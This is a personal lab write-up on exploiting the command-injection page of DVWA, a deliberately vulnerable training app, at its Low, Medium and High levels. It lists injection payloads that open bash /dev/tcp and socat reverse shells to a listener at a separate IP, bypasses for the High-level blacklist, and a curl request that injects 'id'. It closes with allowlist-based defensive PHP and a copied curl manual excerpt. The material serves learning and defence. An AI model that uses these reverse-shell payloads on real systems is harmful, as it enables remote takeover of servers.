command injection reverse shell

AWVS Command Injection

In Linux:
&& - execute the next command only if the previous command succeeds
|| - execute the next command only if the previous command fails

request-example (high)

Low
There are no restrictions.

8.8.8.8;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"

The browser will display a timeout after a long time.

(rlwrap nc -lvnp 9999)
python3 -c 'import pty;pty.spawn("/bin/bash")'

If nc exits in time, the browser echoes:

curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \
-s | grep uid

The curl parameter description is at the bottom↓

https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/

Medium
"&&" and ";" are replaced with nothing. A single "&" is not filtered.

In Linux, the & symbol means to execute the command in the background. The shell then reports the job number, process ID, job status, and the command that started the job
(https://linuxize.com/post/how-to-run-linux-commands-in-background/).
The | symbol means that the output of the previous command is used as the input of the next command; it is commonly called the pipe character. Commands after the pipe will attempt to run regardless of the output of the command before the pipe.

For example

8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1" &
&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1" &
|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1" &

High

The High level applies the following filters. Note that the third entry is "| " (a pipe followed by a space). The approach is similar to Medium; the difference is that more characters are filtered.

$substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

Use socat for remote connection

socat is a multi-functional network tool under Linux; the name comes from "Socket CAT". Its function is similar to Netcat, and it can be regarded as an enhanced version of Netcat. (https://cybr.com/ethical-hacking-archives/create-a-reverse-shell-with-socat-dvwa-os-command-injections/)
socat is a command-line based utility that builds two bidirectional byte streams and transfers data between them. (Manual)
PHP trim(): removes whitespace (or other characters) at the beginning and end of a string

8.8.8.8|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint

https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/

curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=high;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \
-s | grep uid
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impossible
:(

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octets
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Oops. Let the user know there's a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>
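As an added example (not DVWA's own code, and not taken from the tkcyber or cybr write-ups linked above), the following PHP puts the High-level blacklist shown earlier side by side with allowlist validation of the kind the Impossible level performs. The helper names (high_level_filter, allowlist_ipv4, build_blacklist_command, build_allowlist_command) are my own; filter_var with FILTER_VALIDATE_IP / FILTER_FLAG_IPV4 and escapeshellarg are standard PHP functions. The inputs are constructed: a normal address plus the ";" and "|" shapes the page discusses. Nothing is executed; the script only prints the command string each approach would hand to shell_exec.

```php
<?php
// Added example (not DVWA's own code): blacklist filtering vs. allowlist validation.

// The High-level blacklist, as listed on the page: strips the listed tokens
// (str_replace applies the pairs in array order across the whole string).
function high_level_filter(string $target): string {
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    return str_replace(array_keys($substitutions), $substitutions, trim($target));
}

// Allowlist: accept only a syntactically valid IPv4 address, nothing else.
// filter_var returns the validated string or false; this replaces DVWA's
// per-octet is_numeric() check with the built-in validator (assumed PHP 7.1+).
function allowlist_ipv4(string $target): ?string {
    $ip = filter_var(trim($target), FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

// What the blacklist approach would pass to shell_exec().
function build_blacklist_command(string $target): string {
    return 'ping -c 4 ' . high_level_filter($target);
}

// What the allowlist approach would pass to shell_exec(), or null to refuse.
function build_allowlist_command(string $target): ?string {
    $ip = allowlist_ipv4($target);
    if ($ip === null) {
        return null;   // caller reports "invalid IP" and executes nothing
    }
    // escapeshellarg() is defence in depth: $ip is already allowlisted, but
    // quoting means a later change to the validator cannot reintroduce injection.
    return 'ping -c 4 ' . escapeshellarg($ip);
}

// Constructed inputs (not real traffic).
$inputs = array('8.8.8.8', '8.8.8.8;id', '8.8.8.8|id', '8.8.8.8| id');
foreach ($inputs as $input) {
    printf("%-14s blacklist -> %s\n", var_export($input, true), build_blacklist_command($input));
    $cmd = build_allowlist_command($input);
    printf("%-14s allowlist -> %s\n", '', $cmd === null ? 'REJECTED' : $cmd);
}
```

Running it with `php example.php` shows the point the High and Impossible sections make: ';' and '| ' are stripped, but a bare '|' survives the blacklist and reaches the shell, whereas the allowlist rejects every input that is not exactly one IPv4 address and quotes the one it accepts.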

curl parameter description (Manual)

-X, --request <method>
              -X HEAD will not suffice. You need to use the -I, --head option.
              The method string you set with -X, --request will be used for all requests, which if you for example use -L, --location may cause unintended side-effects when curl does not
              If -X, --request is provided several times, the last set value will be used.
               curl -X "DELETE" https://example.com
               curl -X NLST ftp://example.com/

-d, --data <data>
              --data-raw is almost the same but does not have a special interpretation of the @ character. To post data purely binary, you should instead use the --data-binary option. To URL-encode the value of a form field you may use --data-urlencode.
              If any of these options is used more than once on the same command line, the data pieces specified will be merged with a separating &-symbol. Thus, using '-d name=daniel -d
              named 'foobar' would thus be done with -d, --data @foobar. When -d, --data is told to read from a file like that, carriage returns and newlines will be stripped out. If you do not want the @ character to have a special interpretation use --data-raw instead.
              -d, --data can be used several times in a command line
               curl -d "name=curl" https://example.com
               curl -d "name=curl" -d "tool=cmdline" https://example.com
               curl -d @filename https://example.com
              See also --data-binary, --data-urlencode and --data-raw. This option is mutually exclusive to -F, --form and -I, --head and -T, --upload-file.

-H, --header <header/@file>
              Without knowing perfectly well what you are doing. Remove an internal header by giving a replacement without content on the right side of the colon, as in: -H "Host:". If you send the custom header with no-value then its header must be terminated with a semicolon, such as -H "X-Custom-Header;" to send "X-Custom-Header:".
              -H, --header can be used several times in a command line
               curl -H "X-First-Name: Joe" https://example.com
               curl -H "User-Agent: yes-please/2000" https://example.com
               curl -H "Host:" https://example.com
               curl -H @headers.txt https://example.com

-s, --silent
              Use -S, --show-error in addition to this option to disable progress meter but still show error messages.
              Providing -s, --silent multiple times has no extra effect. Disable it again with --no-silent.
               curl -s https://example.com
              See also -v, --verbose, --stderr and --no-progress-meter.